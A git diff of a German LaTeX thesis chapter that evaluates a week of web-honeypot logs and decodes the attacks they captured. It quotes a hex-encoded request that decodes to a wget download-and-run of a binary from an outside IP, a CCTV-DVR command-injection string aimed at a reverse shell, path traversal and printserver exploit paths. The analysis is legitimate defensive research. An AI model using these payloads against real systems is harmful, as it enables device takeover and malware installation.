--- a/Dokumentation/Dokumentation/08_evaluation.tex
+++ b/Dokumentation/Dokumentation/08_evaluation.tex
@@ -52,26 +52,10 @@ Auch ein einzelner Eintrag ist an dieser Stelle erwähnenswert, verdeutlicht er 
 
 './stssys.htm' zählt auch zu der Kategorie einzigartig. So handelt es sich bei dieser Anfrage um den Versuch eine Schwachstelle\footnote{ \textit{Schwachstelle TRENDnet Printserver}: \url{https://neonprimetime.blogspot.de/2016/08/stssyshtm-wget-request.html}} bei TRENDnet Printservern auszunutzen, mit der Folge das betroffene Gerät auf Werkseinstellungen zurücksetzen und somit die IP-Adresse des Gerätes neu zu vergeben.\\
 
-Erst durch die Umwandlung von der hexadezimalen Schreibweise in ASCII offenbart sich '/shell?\%63\%64\%20\%2F\%74\%6D\%70\%3B\%77\%67\%65\%74\%20\%2D\%63\%20\%68\%74\%74\%70\%3A\%2F\%2F\%31\%32\%32\%2E\%31\%31\%34\%2E\%32\%35\%33\%2E\%39\%34\%3A\%31\%35\%35\%32\%31\%2F\%61\%72\%6D\%67\%67\%3B\%63\%68\%6D\%6F\%64\%20\%37\%37\%37\%20\%61\%72\%6D\%67\%67\%3B\%2E\%2F\%61\%72\%6D\%67\%67\%20\%26' als das was er wirklich ist: 'cd /tmp;wget -c http://122.114.253.94:15521/armgg;chmod 777 armgg;./armgg \&'. Über einen 'wget' wird versucht die Ressource 'armgg' von einer IP-Adresse herunterzuladen und gegebenenfalls unterbrochene Downloads, durch den Parameter '-c' für continue, fortzusetzen. 'armgg' soll durch 'chmod 777' von Jedermann gelesen, verändert oder ausgeführt werden können und daraufhin als Hintergrundprozess gestartet werden. Zu gegebener Zeit wird das Projektteam versuchen, diese Datei herunterzuladen und in einer gesicherten Umgebung betrachten.
+Erst durch die Umwandlung von der hexadezimalen Schreibweise in ASCII offenbart sich '/shell?\%63\%64\%20\%2F\%74\%6D\%70\%3B\%77\%67\%65\%74\%20\%2D\%63\%20\%68\%74\%74\%70\%3A\%2F\%2F\%31\%32\%32\%2E\%31\%31\%34\%2E\%32\%35\%33\%2E\%39\%34\%3A\%31\%35\%35\%32\%31\%2F\%61\%72\%6D\%67\%67\%3B\%63\%68\%6D\%6F\%64\%20\%37\%37\%37\%20\%61\%72\%6D\%67\%67\%3B\%2E\%2F\%61\%72\%6D\%67\%67\%20\%26' als das was er wirklich ist: 'cd /tmp;wget -c http://122.114.253.94:15521/armgg;chmod 777 armgg;./armgg \&'. Über einen 'wget' wird versucht die Ressource 'armgg' von einer IP-Adresse herunterzuladen und gegebenenfalls unterbrochene Downloads, durch den Parameter '-c' für continue, fortzusetzen. 'armgg' soll durch 'chmod 777' von Jedermann gelesen, verändert oder ausgeführt werden können und daraufhin als Hintergrundprozess gestartet werden. Zu gegebener Zeit wird das Projektteam versuchen, diese Datei herunterzuladen und in einer gesicherten Umgebung betrachten.\\
 
-/language/Swedish\${IFS}\&\&echo\${IFS}610cker
->qt\&\&tar\${IFS}/string.js
+Noch ausgefallener ist dieser Angriff: '/language/Swedish\${IFS}\&\&echo\${IFS}610cker>qt\&\&tar\${IFS}/string.js'. Ziel dieses Angriffs ist es, eine Reverse-Shell auf   Überwachungskameras zu erzeugen, auf Kerneronsec\footnote{ \textit{Kerneronsec Remote Code Execution in CCTV-DVR}: \url{http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html}} wird die Vorgehensweise genau beschrieben. Der Aufruf von '/../../../../../../../mnt/mtd/qt' ist auch Teil dieses Angriffs.\\
 
-/../../../../../../../mnt/mtd/qt
+Zu guter Letzt ist es auch erwähnenswert, dass auch ein Portscan, hier mit nmap, Spuren\footnote{ \textit{Spuren eines nmap Port-Scans}: \url{http://stateofsecurity.com/?p=467 }} in den Log-Files eines Webservers hinterlässt, so sind die Einträge '/nmaplowercheck1480791133' und '/nice\%20ports\%2C/Tri\%6Eity.txt\%2ebak' zurückzuführen auf einen, vom Projektteam selbst, durchgeführten Scan.\\
 
-http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
-
-
-Zu guter Letzt ist es auch erwähnenswert, dass auch ein Portscan, hier mit nmap, Spuren\footnote{ \textit{Spuren eines nmap Port-Scans}: \url{http://stateofsecurity.com/?p=467 }} in den Log-Files eines Webservers hinterlässt, so sind die Einträge '/nmaplowercheck1480791133' und '/nice\%20ports\%2C/Tri\%6Eity.txt\%2ebak' zurückzuführen auf einen, vom Projektteam selbst, durchgeführten Scan.
-
-
-Maßlos unterschätzt was da auf uns einprasselt
-
-/language/Swedish\${IFS}\&\&echo\${IFS}610cker
->qt\&\&tar\${IFS}/string.js
-
-/../../../../../../../mnt/mtd/qt
-
-
--> Man hätte noch IP-Adressen auswerten können indem man python-file von SNARE editiert hätte -> Zeitgründe
-
+Aus einwöchigem Betrieb des Webhoneypots wird deutlich, dass ein über das Internet erreichbares System einer Vielzahl an unterschiedlichen Angriffen ausgesetzt ist. Der Der Großteil dieser Angriffe findet nach großer Wahrscheinlichkeit automatisiert statt und richtet sich gegen bekannte Sicherheitslücken von eingesetzter Software. Dieser Umstand verdeutlicht die Bedeutung und Wichtigkeit von regelmäßigen Updates. Für einen Systemadministrator hat dies zur Folge, dass der Zeitaufwand zur Erhaltung der Sicherheit mit der Anzahl an eingesetzten Software-Lösungen und Komponenten stark ansteigt.
